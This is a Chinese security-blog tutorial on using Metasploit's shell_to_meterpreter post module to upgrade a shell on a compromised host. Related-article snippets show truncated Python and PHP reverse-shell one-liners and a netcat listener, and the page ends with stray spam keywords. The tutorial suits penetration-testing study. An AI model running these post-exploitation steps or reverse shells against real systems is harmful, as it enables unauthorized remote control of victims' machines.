<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    將一個普通的shell升級為meterpreter shell

    VSole2022-04-05 22:15:26

    在我們進入機器后,有時我們會在滲透后立即獲得Meterpreter Shell。meterpreter shell是一個我們比較喜歡的shell,因為方便我們后續加載各種模塊,因此,我們希望獲得此Shell而不是Command Shell。但大多數情況下,我們在利用機器后,得到的是普通的shell命令。因此,本文介紹了在這種情況下如何將一個簡單的shell升級為meterpreter shell。

    將一個簡單的shell升級為meterpreter shell的步驟:

    在利用機器后,我們得到的是普通的shell命令。

    步驟一:在當前(普通shell)會話中,我們可以通過按CTRL+Z來執行此操作。

    步驟二:現在運行以下命令“search shell_to_meterpreter”

    步驟三:按照命令使用顯示的模塊“use post/multi/manage/shell_to_meterpreter”或簡單地輸入 “use 0”。這兩個命令中的任何一個都可以工作。

    步驟四:現在我們必須配置要升級的會話shell。我們可以通過運行以下命令來查看會話,即“sessions -l”,Id=會話編號。

    步驟5:我們可以使用“show options”命令查看選項。

    步驟6:根據你的會話設置會話ID。我們可以使用以下命令來配置會話,即“set SESSION”,在此例中為“set SESSION 1”。

    步驟7:配置會話后,就可以執行它了。我們可以通過簡單地給出“run”命令來執行。

    輸入run命令后,將打開另一個新會話。

    新會話打開后,選擇該會話并執行。

    第 8 步:現在通過運行“session -i ”命令來執行新會話,在此例中,運行的命令是“session -i 2”。

    運行最后一個命令后,將成功獲得meterpreter shell

    shellsession
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    vulnhub之2much的實踐
    2023-08-14 09:40:07
    vulnhub之2much的實踐
    最近被安排做一些應急響應的工作,所以學習了一下Linux進程相關的知識,越學越多,那就記下來吧!
    很早就想專門寫一篇關于內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)
    靶場Kioptrix Level 1攻略
    2022-04-21 13:47:27
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    0x01 簡介本次測試為實戰測試,測試環境是授權項目中的一部分,敏感信息內容已做打碼處理,僅供討論學習。由于本人在內網方面的掌握也是屬于新手階段,運用到的一些msf攻擊手法也很基礎,請各位表哥多多指教。
    跨語言移植一直是技術領域內難以解決的問題,需要解決語言之間的約束,好在先前我們成功使用 Go 實現了 IIOP 協議通信,有了前車之鑒,所以這次我們將繼續使用跨語言方式實現 Flask Session 偽造。本文以 Apache Superset 權限繞過漏洞(CVE-2023-27524) 為例講述我們是如何在 Go 中實現 Flask 框架的 Session 驗證、生成功能的。
    在我們滲透測試的過程中,最常用的就是基于tcp/udp協議反彈一個shell,也就是反向連接。我們先來講一下什么是正向連接和反向連接。centos執行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 這個payload是反向連接并且只支持Linux,Windows可以參考離別歌師傅的python windows正向連接后門。這樣會把目標機的/bin/bash反彈給攻擊機但是很多Linux的nc很多都是閹割版的,如果目標機器沒有nc或者沒有-e選項的話,不建議使用nc的方式.PHP攻擊機監聽nc -lvvp 4444. 要求目標機器有php然后執行php -r '$sock=fsockopen;exec;'. 加載64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    在我們進入機器后,有時我們會在滲透后立即獲得Meterpreter Shell。meterpreter shell是一個我們比較喜歡的shell,因為方便我們后續加載各種模塊,因此,我們希望獲得此Shell而不是Command Shell
    常用反彈shell方法總結
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类